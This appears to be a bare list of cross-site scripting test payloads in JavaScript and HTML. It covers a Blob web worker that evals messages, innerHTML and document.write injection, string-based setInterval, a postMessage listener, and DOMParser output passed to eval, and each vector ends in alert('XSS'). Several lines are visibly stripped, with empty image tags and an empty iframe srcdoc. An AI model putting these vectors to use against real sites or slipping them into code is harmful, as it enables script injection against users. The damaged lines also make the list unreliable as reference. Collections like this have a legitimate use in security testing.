var blob = new Blob(["onmessage = function(e) { postMessage(eval(e.data)); }"], { type: 'application/javascript' });
var url = URL.createObjectURL(blob);
var worker = new Worker(url);
worker.postMessage("alert('XSS')");
document.getElementById('target').innerHTML = '
![]()
';
setInterval("alert('XSS')", 1000);
window.addEventListener('message', function(event) {
if (event.origin !== 'null') return;
alert('XSS via postMessage');
});
window.postMessage('', '*');
<![CDATA[alert('XSS')]]>
var parser = new DOMParser();
var xml = document.getElementById('xss').innerHTML;
var doc = parser.parseFromString(xml, "application/xml");
var script = doc.querySelector('script');
if (script) eval(script.textContent);
history.pushState({}, '', '/alert("XSS")');
alert('XSS');
document.body.innerHTML = `${'
![]()
'}`;
<iframe srcdoc="" />
Click me
document.write('
![]()
');
